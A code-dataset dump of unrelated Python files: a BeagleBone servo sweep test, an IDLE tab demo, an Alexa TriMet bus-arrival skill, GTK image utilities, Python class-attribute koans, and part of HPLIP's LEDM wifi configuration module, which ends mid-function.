code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
import Adafruit_BBIO.ADC as ADC
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
import time

# Sweep a hobby servo back and forth (0..180 degrees) on a BeagleBone Black
# while printing raw readings from an IR sensor on AIN0.
ADC.setup()
GPIO.setup("P8_7", GPIO.OUT)
# Drive P8_7 high - presumably powers/enables the IR sensor; confirm wiring.
GPIO.output("P8_7", GPIO.HIGH)
servo_pin = "P8_13"
# Duty-cycle endpoints (percent) mapping to the servo's 0/180 degree stops.
duty_min = 3.5#3
duty_max = 14.5#14.5
duty_span = duty_max - duty_min
angle = 0
direction = "left"
# Start PWM at 60 Hz; duty is inverted (100 - x), so the signal polarity is
# active-low for this servo driver circuit.
PWM.start(servo_pin, (100-duty_min), 60.0,1)
angle_f = float(angle)
duty = 100 - ((angle_f / 180) * duty_span + duty_min)
PWM.set_duty_cycle(servo_pin, duty)
while 1:
    voltage0 = ADC.read_raw("AIN0")
    # Map the current angle (0..180) onto the inverted duty-cycle range.
    angle_f = float(angle)
    duty = 100 - ((angle_f / 180) * duty_span + duty_min)
    PWM.set_duty_cycle(servo_pin, duty)
    print("IR_Voltage" , voltage0)
    print("Angle" , angle)
    time.sleep(0.05)
    # Sweep state machine: count up while going "left", down while going
    # "right", reversing direction at 180 and at 0.
    if angle < 180:
        if direction == "left":
            angle = angle + 1
        if direction == "right":
            if angle < 1:
                direction = "left"
                angle = angle +1
            else:
                angle = angle -1
    else:
        direction = "right"
        angle = angle -1
| jordiguerrero/FresonCam | test_IR_servo.py | Python | gpl-3.0 | 1,050 |
"""
TabHighlight Demo
Make sure "Highlight \t tabs" is checked in the Options menu.
You will see tabs in this file highlighted as a checkered red rectangle.
TabNanny will complain if you press F5.
"""
if True:
print('A tab is highlighted before this line')
# more tabs
# more tabs
for i in range(2):
print(i)
print(2*i) # tab/space issue on this line - clearly visible
print(3*i)
| jnvandermeer/PythonFeedback | idlex-1.11.2/demos/tabhighlight_demo.py | Python | gpl-2.0 | 441 |
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import requests
import json
from dateutil.relativedelta import *
from dateutil.parser import *
from datetime import *
import commands
import os
import random
import logging
import boto3
app = Flask(__name__)
app.config.from_pyfile('application.cfg', silent=False)
ask = Ask(app, '/')
names = ["buddy","dude","chum","my friend","Dave","putzy"] # nyuk nyuk
def get_dynamo_client():
    """Build a DynamoDB client from the credentials in the Flask config."""
    cfg = app.config
    return boto3.client(
        'dynamodb',
        aws_access_key_id=cfg["AWS_ACCESS_KEY"],
        aws_secret_access_key=cfg["AWS_SECRET_KEY"],
        region_name=cfg["AWS_REGION"],
    )
@ask.intent('GetArrivals')
def arrivals(location):
    """Speak upcoming TriMet arrivals for the user's stops.

    Stop IDs stored in DynamoDB override the spoken ``location``; when
    neither is available, a default pair of stops ("444,785") is used.
    Returns a flask-ask ``statement`` with the spoken response.
    """
    from dateutil.tz import tzlocal  # local import; dateutil is already a dependency
    client = get_dynamo_client()
    stored_locations = client.get_item(TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}})
    if stored_locations.get("Item"):
        location = str(",".join(stored_locations["Item"]["stop_ids"]['NS']))
    if location is None or location == "home":  # FIX: was `location==None`
        location = "444,785"
    url = "https://developer.trimet.org/ws/V1/arrivals?locIDs={}&appID={}&json=true".format(location,app.config["APP_ID"])
    try:
        api_response_json = requests.get(url)
        api_response = json.loads(api_response_json.text)
        # FIX: was parse(commands.getoutput("date")) -- the `commands` module
        # is Python-2 only and shelling out is needless. A tz-aware "now"
        # keeps the subtraction valid against TriMet's tz-aware timestamps.
        now = datetime.now(tzlocal())
        alexa_response = ""
        if "resultSet" in api_response and "arrival" in api_response["resultSet"]:
            for arrival in api_response["resultSet"]["arrival"]:
                if arrival.get("status") == "scheduled":
                    arrival_time = parse(arrival["scheduled"])
                else:
                    arrival_time = parse(arrival["estimated"])
                route = arrival["route"]
                # FIX: relativedelta(...).minutes is only the minutes
                # *component* (wrong for waits over an hour); use total minutes.
                delta = int((arrival_time - now).total_seconds() // 60)
                if alexa_response == "":
                    alexa_response = "The next {} bus will arrive at {} in ".format(str(route),str(arrival["locid"]))
                else:
                    alexa_response += ". A {} bus will arrive at {} in ".format(str(route),str(arrival["locid"]))
                alexa_response += "{} minutes".format(str(delta))
        else:
            # FIX: dropped a stray .format() call on a placeholder-free string
            alexa_response = "Sorry, I couldn't find any arrival times for you"
    except Exception as e:
        alexa_response = "I'm sorry, {}, something went horribly wrong. {}".format(random.choice(names),e)
    return statement(alexa_response)
@ask.intent('AddStopId')
def add_stop_id(location):
    """Add a TriMet stop ID to the user's stored set in DynamoDB."""
    client = get_dynamo_client()
    lookup = client.get_item(TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}})
    if lookup['ResponseMetadata']['HTTPStatusCode'] == 404:
        return statement("Your ID was not found.")
    alexa_response = "Okeedoke. Adding stop ID {}".format(location)
    # ADD on a number-set attribute creates it or appends to it.
    client.update_item(
        TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}},
        UpdateExpression='ADD stop_ids :i',
        ExpressionAttributeValues={":i": {'NS': [location]}},
        ReturnValues="UPDATED_NEW",
    )
    return statement(alexa_response)
@ask.intent('RemoveStopId')
def remove_stop_id(location):
    """Remove a TriMet stop ID from the user's stored set in DynamoDB."""
    client = get_dynamo_client()
    lookup = client.get_item(TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}})
    if lookup['ResponseMetadata']['HTTPStatusCode'] == 404:
        return statement("Your ID was not found.")
    alexa_response = "Okeedoke. Removing stop ID {}".format(location)
    # DELETE takes the given value out of the stop_ids number set.
    client.update_item(
        TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}},
        UpdateExpression='DELETE stop_ids :i',
        ExpressionAttributeValues={":i": {'NS': [location]}},
        ReturnValues="UPDATED_NEW",
    )
    return statement(alexa_response)
@ask.intent('ListStopIds')
def list_stop_ids():
    """Speak back every stop ID the user has stored in DynamoDB."""
    client = get_dynamo_client()
    record = client.get_item(TableName='stop_ids',
        Key={'user_id': {'S': session.user.userId}})
    item = record.get("Item")
    if item:
        alexa_response = "You've stored stop i d's {}".format(str(" and ".join(item["stop_ids"]['NS'])))
    else:
        alexa_response = "Sorry, {}, you haven't stored any stop i d's".format(random.choice(names))
    return statement(alexa_response)
if __name__ == "__main__":
    # Run the Flask development server when executed directly.
    app.run(debug=True)
| crustyratfink/ask_trimet | echo_trimet.py | Python | apache-2.0 | 4,858 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2009 Canonical
Copyright (C) 2012 Fabio Erculiani
Authors:
Michael Vogt
Fabio Erculiani
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; version 3.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import logging
import shutil
from gi.repository import Gtk, GdkPixbuf, GObject
from entropy.const import const_mkstemp
from _entropy.rigo.paths import ICON_PATH
LOG = logging.getLogger(__name__)
def point_in(rect, px, py):
    """Return True when point (px, py) lies inside *rect* (edges inclusive)."""
    within_x = rect.x <= px <= rect.x + rect.width
    within_y = rect.y <= py <= rect.y + rect.height
    return within_x and within_y
def init_sc_css_provider(toplevel, settings, screen, datadir):
    """Install the Rigo CSS style provider matching the current Gtk theme.

    A theme-specific stylesheet (rigo.<theme>.css) is preferred; plain
    rigo.css is the fallback. Returns the stylesheet path used, or None
    when no stylesheet exists (styling then falls back to the Gtk theme).
    """
    context = toplevel.get_style_context()
    theme_name = settings.get_property("gtk-theme-name").lower()

    if hasattr(toplevel, '_css_provider'):
        # A provider is already attached: reuse it if the theme is
        # unchanged, otherwise drop it before installing a fresh one.
        if toplevel._css_provider._theme_name == theme_name:
            return
        else:  # clean up old css provider if exists
            context.remove_provider_for_screen(screen, toplevel._css_provider)

    # munge css path for theme-name
    css_path = os.path.join(datadir,
                            "ui/gtk3/css/rigo.%s.css" % theme_name)
    # if no css for theme-name try fallback css
    if not os.path.exists(css_path):
        css_path = os.path.join(datadir, "ui/gtk3/css/rigo.css")
    if not os.path.exists(css_path):
        # Missing fallback is non-fatal: some styling will simply be
        # derived from the plain ol' Gtk theme.
        msg = "Could not set rigo " + \
            "CSS provider. File '%s' does not exist!"
        # FIX: Logger.warn is a deprecated alias; use warning()
        LOG.warning(msg % css_path)
        return None

    # things seem ok, now set the css provider for Rigo
    msg = "Rigo style provider for %s Gtk theme: %s"
    LOG.info(msg % (theme_name, css_path))
    provider = Gtk.CssProvider()
    provider._theme_name = theme_name
    toplevel._css_provider = provider
    provider.load_from_path(css_path)
    context.add_provider_for_screen(screen, provider, 800)
    return css_path
def get_sc_icon_theme(datadir):
    """Return the default Gtk icon theme with Rigo's extra search paths added."""
    theme = Gtk.IconTheme.get_default()
    # additional icons come from app-install-data
    theme.append_search_path(ICON_PATH)
    for subdir in ("icons", "emblems"):
        theme.append_search_path(os.path.join(datadir, subdir))
    # HACK: make it more friendly for local installs (for mpt)
    theme.append_search_path(datadir+"/icons/32x32/status")
    return theme
def resize_image(max_width, image_path, final_image_path):
    """Scale the image at image_path to at most max_width pixels wide
    (aspect ratio preserved) and move the result to final_image_path.
    Saves as PNG, falling back to JPEG if PNG writing fails."""
    dirname = os.path.dirname(final_image_path)
    # Work on a temp copy created in the destination directory so the final
    # os.rename() below is a same-filesystem (atomic) move.
    tmp_fd, new_image_path = const_mkstemp(
        dir=dirname, prefix="resize_image")
    os.close(tmp_fd)
    shutil.copy2(image_path, new_image_path)
    img = Gtk.Image()
    img.set_from_file(new_image_path)
    img_buf = img.get_pixbuf()
    w, h = img_buf.get_width(), img_buf.get_height()
    if w > max_width:
        # resize pix, keeping the aspect ratio
        new_w = max_width
        new_h = new_w * h / w
        img_buf = img_buf.scale_simple(int(new_w),
            int(new_h), GdkPixbuf.InterpType.BILINEAR)
        try:
            img_buf.save(new_image_path, "png")
        except GObject.GError:
            # libpng issue? try jpeg
            img_buf.save(new_image_path, "jpeg")
    del img_buf
    del img
    os.rename(new_image_path, final_image_path)
def resize_image_height(max_height, image_path, final_image_path):
    """Scale the image at image_path to at most max_height pixels tall
    (aspect ratio preserved) and move the result to final_image_path.
    Saves as PNG, falling back to JPEG if PNG writing fails."""
    dirname = os.path.dirname(final_image_path)
    # Temp copy in the destination directory so os.rename() stays on the
    # same filesystem (atomic move).
    tmp_fd, new_image_path = const_mkstemp(
        dir=dirname, prefix="resize_image")
    os.close(tmp_fd)
    shutil.copy2(image_path, new_image_path)
    img = Gtk.Image()
    img.set_from_file(new_image_path)
    img_buf = img.get_pixbuf()
    w, h = img_buf.get_width(), img_buf.get_height()
    if h > max_height:
        # resize pix, keeping the aspect ratio
        new_h = max_height
        new_w = new_h*w/h
        img_buf = img_buf.scale_simple(int(new_w),
            int(new_h), GdkPixbuf.InterpType.BILINEAR)
        try:
            img_buf.save(new_image_path, "png")
        except GObject.GError:
            # libpng issue? try jpeg
            img_buf.save(new_image_path, "jpeg")
    del img_buf
    del img
    os.rename(new_image_path, final_image_path)
| Sabayon/entropy | rigo/rigo/ui/gtk3/utils.py | Python | gpl-2.0 | 4,893 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutClassMethods in the Ruby Koans
#
from runner.koan import *
class AboutClassAttributes(Koan):
    """Koan exercises on class vs. instance attributes, classmethods,
    staticmethods and properties, with the answers filled in."""

    class Dog:
        pass

    def test_objects_are_objects(self):
        fido = self.Dog()
        self.assertEqual(True, isinstance(fido, object))

    def test_classes_are_types(self):
        self.assertEqual(True, self.Dog.__class__ == type)

    def test_classes_are_objects_too(self):
        self.assertEqual(True, issubclass(self.Dog, object))

    def test_objects_have_methods(self):
        fido = self.Dog()
        # NOTE(review): dir() counts are interpreter-version dependent; 26
        # held on the Python these koans were solved with -- confirm locally.
        self.assertEqual(26, len(dir(fido)))

    def test_classes_have_methods(self):
        self.assertEqual(26, len(dir(self.Dog)))

    def test_creating_objects_without_defining_a_class(self):
        singularity = object()
        self.assertEqual(23, len(dir(singularity)))

    def test_defining_attributes_on_individual_objects(self):
        fido = self.Dog()
        fido.legs = 4
        self.assertEqual(4, fido.legs)

    def test_defining_functions_on_individual_objects(self):
        fido = self.Dog()
        fido.wag = lambda : 'fidos wag'
        self.assertEqual('fidos wag', fido.wag())

    def test_other_objects_are_not_affected_by_these_singleton_functions(self):
        fido = self.Dog()
        rover = self.Dog()
        def wag():
            return 'fidos wag'
        fido.wag = wag
        # wag was attached to fido only, so rover has no such attribute
        with self.assertRaises(AttributeError): rover.wag()

    # ------------------------------------------------------------------

    class Dog2:
        def wag(self):
            return 'instance wag'
        def bark(self):
            return "instance bark"
        def growl(self):
            return "instance growl"
        #https://stackoverflow.com/questions/12179271/meaning-of-classmethod-and-staticmethod-for-beginner
        # The decorated versions below rebind 'bark' and 'growl' in the class
        # namespace, shadowing the instance methods defined above.
        @staticmethod
        def bark():
            return "staticmethod bark, arg: None"
        @classmethod
        def growl(cls):
            return "classmethod growl, arg: cls=" + cls.__name__

    def test_since_classes_are_objects_you_can_define_singleton_methods_on_them_too(self):
        self.assertRegex(self.Dog2.growl(), "classmethod growl, arg: cls=Dog2")

    def test_classmethods_are_not_independent_of_instance_methods(self):
        fido = self.Dog2()
        self.assertRegex(fido.growl(), "classmethod growl, arg: cls=Dog2")
        self.assertRegex(self.Dog2.growl(), "classmethod growl, arg: cls=Dog2")

    def test_staticmethods_are_unbound_functions_housed_in_a_class(self):
        self.assertRegex(self.Dog2.bark(), "staticmethod bark, arg: None")

    def test_staticmethods_also_overshadow_instance_methods(self):
        fido = self.Dog2()
        self.assertRegex(fido.bark(), "staticmethod bark, arg: None")

    # ------------------------------------------------------------------

    class Dog3:
        def __init__(self):
            self._name = None
        def get_name_from_instance(self):
            return self._name
        def set_name_from_instance(self, name):
            self._name = name
        @classmethod
        def get_name(cls):
            return cls._name
        @classmethod
        def set_name(cls, name):
            cls._name = name
        # 'name' is built from classmethod objects, which are not plain
        # callables -- assigning through it raises TypeError (tested below).
        name = property(get_name, set_name)
        name_from_instance = property(get_name_from_instance, set_name_from_instance)

    def test_classmethods_can_not_be_used_as_properties(self):
        fido = self.Dog3()
        with self.assertRaises(TypeError): fido.name = "Fido"

    def test_classes_and_instances_do_not_share_instance_attributes(self):
        fido = self.Dog3()
        fido.set_name_from_instance("Fido")
        fido.set_name("Rover")
        self.assertEqual("Fido", fido.get_name_from_instance())
        self.assertEqual("Rover", self.Dog3.get_name())

    def test_classes_and_instances_do_share_class_attributes(self):
        fido = self.Dog3()
        fido.set_name("Fido")
        self.assertEqual("Fido", fido.get_name())
        self.assertEqual("Fido", self.Dog3.get_name())

    # ------------------------------------------------------------------

    class Dog4:
        def a_class_method(cls):
            return 'dogs class method'
        def a_static_method():
            return 'dogs static method'
        # Pre-decorator-syntax wrapping: equivalent to using @classmethod /
        # @staticmethod above the defs.
        a_class_method = classmethod(a_class_method)
        a_static_method = staticmethod(a_static_method)

    def test_you_can_define_class_methods_without_using_a_decorator(self):
        self.assertEqual('dogs class method', self.Dog4.a_class_method())

    def test_you_can_define_static_methods_without_using_a_decorator(self):
        self.assertEqual('dogs static method', self.Dog4.a_static_method())

    # ------------------------------------------------------------------

    def test_heres_an_easy_way_to_explicitly_call_class_methods_from_instance_methods(self):
        fido = self.Dog4()
        self.assertEqual('dogs class method', fido.__class__.a_class_method())
| ChristianAA/python_koans_solutions | python3/koans/about_class_attributes.py | Python | mit | 4,988 |
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2009 Hewlett-Packard Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Shunmugaraj.K
#
# StdLib
import time
import io
import binascii
import xml.parsers.expat
from string import *
# Local
from .g import *
from . import device, utils
from .sixext import to_bytes_utf8
http_result_pat = re.compile("""HTTP/\d.\d\s(\d+)""", re.I)
HTTP_OK = 200
HTTP_ACCEPTED = 202
HTTP_NOCONTENT = 204
HTTP_ERROR = 500
MAX_RETRIES = 2
LEDM_WIFI_BASE_URI = "/IoMgmt/Adapters/"
# This payload is working for LaserJet Devices
adapterPowerXml_payload2 ="""<?xml version="1.0" encoding="UTF-8" ?><io:Adapter xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:wifi="http://www.hp.com/schemas/imaging/con/wifi/2009/06/26"> <io:HardwareConfig> <dd:Power>%s</dd:Power> </io:HardwareConfig> </io:Adapter>"""
# This payload is working for OfficeJet and Photosmart Devices
adapterPowerXml_payload1 = """<?xml version="1.0" encoding="UTF-8"?><io:Adapters xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/"><io:Adapter><io:HardwareConfig><dd:Power>%s</dd:Power></io:HardwareConfig></io:Adapter></io:Adapters>"""
passPhraseXml="""<io:Profile xmlns:io="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:wifi="http://www.hp.com/schemas/imaging/con/wifi/2009/06/26" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/iomgmt/2008/11/30 ../../schemas/IoMgmt.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../../schemas/dd/DataDictionaryMasterLEDM.xsd"><io:AdapterProfile><io:WifiProfile><wifi:SSID>%s</wifi:SSID><wifi:CommunicationMode>%s</wifi:CommunicationMode><wifi:EncryptionType>%s</wifi:EncryptionType><wifi:AuthenticationMode>%s</wifi:AuthenticationMode></io:WifiProfile></io:AdapterProfile></io:Profile>"""
keyInfoXml = """<io:KeyInfo><io:WpaPassPhraseInfo><wifi:RsnEncryption>AESOrTKIP</wifi:RsnEncryption><wifi:RsnAuthorization>autoWPA</wifi:RsnAuthorization><wifi:PassPhrase>%s</wifi:PassPhrase></io:WpaPassPhraseInfo></io:KeyInfo>"""
def getAdaptorList(dev):
    """Query /IoMgmt/Adapters on the device and return a flat dict describing
    each I/O adapter.

    Keys: 'adaptorlistlength' plus per-adapter 'adaptorid-N', 'adaptorname-N',
    'adaptortype-N', and placeholder 'adaptorpresence-N'/'adaptorstate-N'
    (this URI does not report presence/state). Returns {} on HTTP failure.
    """
    ret,params,elementCount,code ={},{},0,HTTP_ERROR
    max_tries = 0
    while max_tries < MAX_RETRIES:
        max_tries +=1
        URI = LEDM_WIFI_BASE_URI[0:len(LEDM_WIFI_BASE_URI)-1]# to remove "\" from the string
        paramsList,code = readXmlTagDataFromURI(dev,URI,'<io:Adapters', '<io:Adapter>')
        if code == HTTP_OK:
            break
    if code != HTTP_OK:
        log.error("Request Failed With Response Code %d"%code)
        return ret
    ret['adaptorlistlength'] = len(paramsList)
    if len(paramsList) != 0:
        a = 0
        for params in paramsList:
            # Not provided by this URI; filled with empty strings so callers
            # can index them uniformly.
            ret['adaptorpresence-%d' % a] = ''
            ret['adaptorstate-%d' % a] = ''
            try:
                ret['adaptorid-%d' % a] = params['io:adapter-map:resourcenode-map:resourcelink-dd:resourceuri']
            except KeyError as e:
                log.debug("Missing response key: %s" % e) #changed from error to debug
                ret['adaptorid-%d' % a]=""
            try:
                ret['adaptorname-%d' % a] = params['io:adapter-io:hardwareconfig-dd:name']
            except KeyError as e:
                log.debug("Missing response key: %s" % e) #changed from error to debug
                ret['adaptorname-%d' % a] = ""
            try:
                ret['adaptortype-%d' % a] = params['io:adapter-io:hardwareconfig-dd:deviceconnectivityporttype']
            except KeyError as e:
                log.debug("Missing response key: %s" % e) #changed from error to debug
                ret['adaptortype-%d' % a] = ""
            a = a+1
    return ret
def getWifiAdaptorID(dev):
    """Return [id, name, state, presence] entries for each wifi adapter.

    Only adapters whose type is wifiembedded/wifiaccessory are included.
    Missing ids default to -1; other missing fields to 'Unknown'.
    """
    found = []
    info = getAdaptorList(dev)
    num_adaptors = info.get('adaptorlistlength', 0)
    for n in range(num_adaptors):
        adaptor_type = info.get('adaptortype-%d' % n, '')
        if adaptor_type.lower() not in ('wifiembedded', 'wifiaccessory'):
            continue
        entry = []
        for field in ('adaptorid', 'adaptorname', 'adaptorstate', 'adaptorpresence'):
            key = '%s-%d' % (field, n)
            if key in info:
                entry.append(info[key])
            elif field == 'adaptorid':
                entry.append(-1)
            else:
                entry.append('Unknown')
        found.append(entry)
    return found
def setAdaptorPower(dev, adapterList, power_state='on'):
    """Set the power state of the first adapter in *adapterList*.

    Tries the OfficeJet/Photosmart payload first, then falls back to the
    LaserJet payload on failure. Returns (id, name, state, presence) of the
    adapter acted on, or (-1, "", "", "") when the list is empty. Note the
    return inside the loop: only the FIRST adapter is ever processed.
    """
    adaptor_id=-1
    adaptorName =""
    for a in adapterList:
        adaptor_id = a[0]
        adaptorName = a[1]
        ret,powerXml,URI,code = {},'','',HTTP_ERROR
        URI = LEDM_WIFI_BASE_URI + adaptorName
        powerXml = adapterPowerXml_payload1 %(power_state)
        ret['errorreturn'] = writeXmlDataToURI(dev,URI,powerXml,10)
        if not(ret['errorreturn'] == HTTP_OK or ret['errorreturn'] == HTTP_NOCONTENT):
            log.debug("Wifi Adapter turn ON request Failed. ResponseCode=%s AdaptorId=%s AdaptorName=%s. Trying another interface" %(ret['errorreturn'],adaptor_id,adaptorName))
            # Retry with the LaserJet-style payload.
            powerXml = adapterPowerXml_payload2 %(power_state)
            ret['errorreturn'] = writeXmlDataToURI(dev,URI,powerXml,10)
            if not(ret['errorreturn'] == HTTP_OK or ret['errorreturn'] == HTTP_NOCONTENT):
                log.error("Wifi Adapter turn ON request Failed. ResponseCode=%s AdaptorId=%s AdaptorName=%s" %(ret['errorreturn'],adaptor_id,adaptorName))
            else:
                log.debug("Wifi Adapter turn ON request is Success. AdaptorId=%s AdaptorName=%s" %(adaptor_id,adaptorName))
        # adapaterState = a[2], adapterPresence= a[3]
        return adaptor_id, adaptorName, a[2], a[3]
    return -1 ,"","",""
def performScan(dev, adapterName, ssid=None):
    """Scan for wifi networks (or one specific *ssid*) via the device.

    Returns a flat dict with 'numberofscanentries' and, per network N:
    'ssid-N', 'bssid-N', 'channel-N', 'communicationmode-N', 'dbm-N',
    'encryptiontype-N', 'signalstrength-N', plus signal-strength bounds.
    Polls until the device stops answering HTTP 202 (scan in progress).
    """
    ret ={}
    if ssid is None:
        URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks"
    else:
        URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks/SSID="+ssid
    while True:
        params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:WifiNetworks', '<io:WifiNetwork>',10)
        if code == HTTP_ACCEPTED:
            continue
        else:
            break
    ret['numberofscanentries'] = elementCount
    if code != HTTP_OK:
        log.error("Request Failed With Response Code %d"%code)
        return ret
    if params is not None:
        if elementCount == 1:
            try:
                # FIX: str.decode("hex") is Python 2 only and raised
                # AttributeError on Python 3; decode hex via binascii, the
                # same way the multi-entry branch below does.
                try:
                    ssid = binascii.unhexlify(str(params['io:wifinetworks-io:wifinetwork-wifi:ssid']).encode('utf-8')).decode('utf-8')
                except (TypeError, binascii.Error):
                    ssid = params['io:wifinetworks-io:wifinetwork-wifi:ssid']
                if not ssid:
                    ret['ssid-0'] = to_unicode('(unknown)')
                else:
                    ret['ssid-0'] = ssid
                try:
                    ret['bssid-0'] = binascii.unhexlify(str(params['io:wifinetworks-io:wifinetwork-wifi:bssid']).encode('utf-8')).decode('utf-8')
                except:
                    ret['bssid-0'] = params['io:wifinetworks-io:wifinetwork-wifi:bssid']
                ret['channel-0'] = params['io:wifinetworks-io:wifinetwork-wifi:channel']
                ret['communicationmode-0'] = params['io:wifinetworks-io:wifinetwork-wifi:communicationmode']
                ret['dbm-0'] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm']
                ret['encryptiontype-0'] = params['io:wifinetworks-io:wifinetwork-wifi:encryptiontype']
                ret['signalstrength-0'] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength']
            except KeyError as e:
                log.debug("Missing response key: %s" % e)
        else:
            for a in range(elementCount):
                try:
                    try:
                        ssid = binascii.unhexlify(str(params['io:wifinetworks-io:wifinetwork-wifi:ssid-%d' % a]).encode('utf-8')).decode('utf-8')
                    except TypeError:
                        # Some devices returns one invalid SSID (i.e. 0) along with valid SSIDs. e.g. Epic.
                        ssid = params['io:wifinetworks-io:wifinetwork-wifi:ssid-%d' % a]
                    if not ssid:
                        ret['ssid-%d' % a] = to_unicode('(unknown)')
                    else:
                        ret['ssid-%d' % a] = ssid
                    try:
                        # FIX: was str.decode("hex") (Python 2 only)
                        ret['bssid-%d' % a] = binascii.unhexlify(str(params['io:wifinetworks-io:wifinetwork-wifi:bssid-%d' % a]).encode('utf-8')).decode('utf-8')
                    except:
                        ret['bssid-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:bssid-%d' % a]
                    ret['channel-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:channel-%d' % a]
                    ret['communicationmode-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:communicationmode-%d' % a]
                    ret['dbm-%d' % a] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm-%d' % a]
                    ret['encryptiontype-%d' % a] = params['io:wifinetworks-io:wifinetwork-wifi:encryptiontype-%d' % a]
                    ret['signalstrength-%d' % a] = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength-%d' % a]
                except KeyError as e:
                    log.debug("Missing response key: %s" % e)
        try:
            ret['signalstrengthmax'] = 5
            ret['signalstrengthmin'] = 0
        except KeyError as e:
            log.debug("Missing response key: %s" % e)
    return ret
def getIPConfiguration(dev, adapterName):
    """Read the adapter's IPv4 configuration from the device.

    Tries the older per-adapter /Protocols URI first, then falls back to
    the newer /DevMgmt/IOConfigDyn.xml schema. Returns the 7-tuple
    (ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns) with
    '0.0.0.0'/'Unknown' defaults on failure. hostname is never filled in
    here - it always comes back as its default. addressmode is collapsed
    to either 'dhcp' or 'autoip'.
    """
    ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns = \
        '0.0.0.0', 'Unknown', 'Unknown', '0.0.0.0', '0.0.0.0', '0.0.0.0', '0.0.0.0'
    protocol = 'old'
    URI = LEDM_WIFI_BASE_URI + adapterName + "/Protocols"
    #URI = "/DevMgmt/IOConfigDyn.xml"
    params,code,elementCount = {},HTTP_ERROR,0
    max_tries = 0
    while max_tries < MAX_RETRIES:
        max_tries +=1
        params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:Protocol', '<io:Protocol')
        if code == HTTP_OK:
            break
    if code != HTTP_OK:
        # Old URI failed: retry against the newer IOConfigDyn schema.
        max_tries = 0
        URI = "/DevMgmt/IOConfigDyn.xml"
        while max_tries < MAX_RETRIES:
            max_tries +=1
            params,code,elementCount = readXmlDataFromURI(dev,URI,'<iocfgdyn2:IOConfigDyn', '<dd3:IOAdaptorConfig')
            if code == HTTP_OK:
                protocol = 'new'
                break
        if code != HTTP_OK:
            log.error("Request Failed With Response Code %d" %code)
            return ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns
    if protocol == 'old':
        if params is not None and code == HTTP_OK:
            try:
                ip = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:ipv4address']
                subnetmask = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:subnetmask']
                gateway = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:defaultgateway']
                if 'DHCP' in params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:configmethod']:
                    addressmode = 'dhcp'
                else:
                    addressmode = 'autoip'
                if elementCount ==1:
                    pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress']
                    sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress']
                # With several protocol entries, take the first DNS pair
                # whose primary address is not the empty IPv6 "::".
                for a in range(elementCount):
                    if params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a] !="::":
                        pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a]
                        sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress-%d' %a]
                        break
            except KeyError as e:
                log.error("Missing response key: %s" % str(e))
    else:
        if params is not None and code == HTTP_OK:
            # Newer schema: each field may appear with or without a '-0'
            # suffix depending on the device, hence the paired lookups.
            try:
                #ip = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:ipv4address']
                try:
